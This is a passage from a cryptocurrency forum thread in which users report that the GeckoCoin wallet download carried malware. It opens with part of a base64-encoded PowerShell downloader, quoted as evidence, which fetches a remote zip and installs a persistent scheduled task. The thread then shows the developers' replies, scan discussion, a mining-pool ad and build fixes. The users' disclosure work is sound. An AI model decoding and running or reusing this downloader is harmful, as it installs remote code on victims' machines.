gAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A | base64 -d https://www.virustotal.com/gui/file/f41649a4cb6f167c66ef4e2252c3a50f2b3b8a8d6818580ca0e7d6dec2142ac9/behaviorhttps://www.virustotal.com/gui/file/7d8bb86d079e81b143f82ead0165f92170795228c06fcf1317e6d99972d90256/behaviorNot only is the windows wallet malicious, so are linux precompiled binares that drop files in /var/lib/fwupd/gnupg/ and /root/.dbus/session-bus/ and then try to set auto execute using /usr/bin/dbus-launch dbus-launch --autolaunch a39eb3ed78b7401fb6809ed0c562a5b1 --binary-syntax --close-stderr So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet. Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 09:12:01 AM Last edit: March 13, 2023, 10:25:33 PM by Mr. Big |
|
So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet. Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.
Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again! We asked for many pools, but did not even try to climb into your fraudulent pool https://mining4people.com
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 12:35:52 PM |
|
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 02:45:50 PM |
|
Dear traders, users. Download wallets only from official sources. Source: https://gecko.mn/ 📢
|
|
|
|
RobbK
Newbie
Offline
Activity: 27
Merit: 0
|
|
March 13, 2023, 02:49:50 PM |
|
Once the wallet issue is fixed, then you upload the updated ver to github where it's supposed to be ( zip fie and correct hashes ). Good to go. The virustotal website is not lying to anyone. Anyone can use it and cross check the results. The bootstrap was taken down. Must of been a reason that it was. I don't see a problem as long as the scan is clean. Avg free antivirus is also stopping the CMD and powershell from executing. If the issue is on the blockchain and syncing then maybe more of problem. Clean it and post the updated wallet to Github zipped with hashes. Link to it from your website. No reason to be upset. If you think Virustotal is in the wrong, Avg is in the wrong. Reach out to them. Stop banning people from your discord who have concerns. That's not a good route to take.
|
|
|
|
|
RobbK
Newbie
Offline
Activity: 27
Merit: 0
|
|
March 13, 2023, 03:48:32 PM |
|
The Virustotal website is not going away. If your results are good - then that is trust. All the scans can be crossed checked by each user. Clean up your wallet and blockchain so it passes please.
|
|
|
|
furcalor
Jr. Member
Offline
Activity: 59
Merit: 3
|
|
March 13, 2023, 04:31:11 PM |
|
Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again!
Since you asked for video proof earlier, see here: https://youtu.be/oy7Ha-WkXVoAs you can see in the video the wallet is downloaded from the official website and the send to virustotal. After which a rescan is ran on the file since the hash matches the earlier hash. AV still reports the wallet as containing Trojan-Downloader.Win64.Alien.acs and the behaviour tab still shows the powershell. Ofcourse now it does fail to download the .zip which is a good thing. I don't know if you are the person building and publishing the wallet files. If your not, then who ever is doing that for you has taken an advantage of it. I am glad to see that the bootstrap.zip file has been removed from update.airdroper.net so users no longer get that downloaded.
|
|
|
|
|
furcalor
Jr. Member
Offline
Activity: 59
Merit: 3
|
|
March 13, 2023, 07:57:25 PM Last edit: March 13, 2023, 08:26:58 PM by furcalor |
|
Looking much better, would still advice caution as with any file downloaded from the internet.
Based on the latest wallet virustotal scans and behavior checks, no more commands are executed. All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.
Edit to add, Only thing that really is a bit wierd is the file C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000 But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox. Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.
Is it possible your build environment was compromised when building the previous wallets?
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 08:35:48 PM |
|
Looking much better, would still advice caution as with any file downloaded from the internet.
Based on the latest wallet virustotal scans and behavior checks, no more commands are executed. All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.
Edit to add, Only thing that really is a bit wierd is the file C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000 But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox. Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.
Is it possible your build environment was compromised when building the previous wallets?
We are dealing with the situation, we have installed wallets of other cryptocurrency projects.
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 10:24:24 PM |
|
We did not find the problem, but just in case, we reinstalled the server (made a backup) and restarted the site with all the necessary services. We will also host the wallet on Github and set the MD5 hash of the wallet for validation.
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 13, 2023, 11:37:31 PM |
|
|
|
|
|
Bivis777
Newbie
Offline
Activity: 8
Merit: 0
|
|
March 15, 2023, 08:53:37 AM |
|
I lost so much money on masternodes that I'm already scared
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 15, 2023, 12:18:39 PM |
|
I lost so much money on masternodes that I'm already scared With us you will not lose money. We don't really care about the masternode process. We have a different mission. We make games, and the masternode is a nice bonus.
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 30, 2023, 06:13:02 PM |
|
Hello guys, haven't seen each other for a long time, I'm glad to announce that we have done a lot in the next game, today we were able to make friends with the wallet with the game payment system. As soon as there is news, I will definitely let you know.
|
|
|
|
Gecko_mn (OP)
Newbie
Offline
Activity: 39
Merit: 0
|
|
March 30, 2023, 06:16:42 PM |
|
If you have not yet subscribed to us on Twitter, do it right now, now all news will be published only there. https://twitter.com/geckocoin_mn
|
|
|
|
preda
|
|
April 18, 2023, 10:23:56 PM |
|
I lost so much money on masternodes that I'm already scared With us you will not lose money. We don't really care about the masternode process. We have a different mission. We make games, and the masternode is a nice bonus. info about masternode? how many coin require? apr%? there is a guide?
|
|
|
|
mr-miner
Jr. Member
Offline
Activity: 57
Merit: 1
|
|
May 23, 2023, 11:06:16 AM |
|
https://mr-miner.org/ has successfully added GeckoCoin GEC Join now! Fees Share/Solo: 0.5% Min Payout: 1 GEC DIscord: https://discord.gg/CAsyyqFpjQPaymentintervall every 30 mins Miner command line: -a gr -o stratum+tcp://stratum.mr-miner.org:5946 -u WALLET_ADDRESS.WORKER_NAME -p c=GEC Cheers!
|
|
|
|
mameex
Newbie
Offline
Activity: 11
Merit: 0
|
|
September 05, 2023, 04:24:56 PM Last edit: September 05, 2023, 07:40:53 PM by mameex |
|
Is there any working block explorer available for public use? Because geckocoin binaries for Ubuntu 20 doesn't work for Ubuntu 22 I made a guide/solution on how to build them from source. wget https://github.com/dashpay/bls-signatures/archive/v20181101.zip unzip v20181101.zip cd bls-signatures-20181101 mkdir build cmake ../ cd .. repair file: bls-signatures-20181101/contrib/relic/src/md/blake2.h line 64 replace with: typedef struct ALIGNME( 64 ) __blake2s_state line 89 replace with: typedef struct ALIGNME( 64 ) __blake2b_state repair file: bls-signatures-20181101/contrib/catch/catch.hpp replace: static constexpr std::size_t sigStackSize = 32768 >= MINSIGSTKSZ ? 32768 : MINSIGSTKSZ; with: static constexpr std::size_t sigStackSize = 32768; go back to build folder. bls-signatures-20181101/build download geckcoin source: https://github.com/GeckoProjectMN/GeckoProject/archive/refs/tags/v.1.1.tar.gzrepair file: src/httpserver.cpp add at line 32: repair file: src/validation.cpp add at line 46: #include <boost/bind.hpp> repair file: src/validationinterface.cpp add at line 7: #include <boost/bind.hpp> Now you can finally build binaries for Ubuntu 22.04.
|
|
|
|
|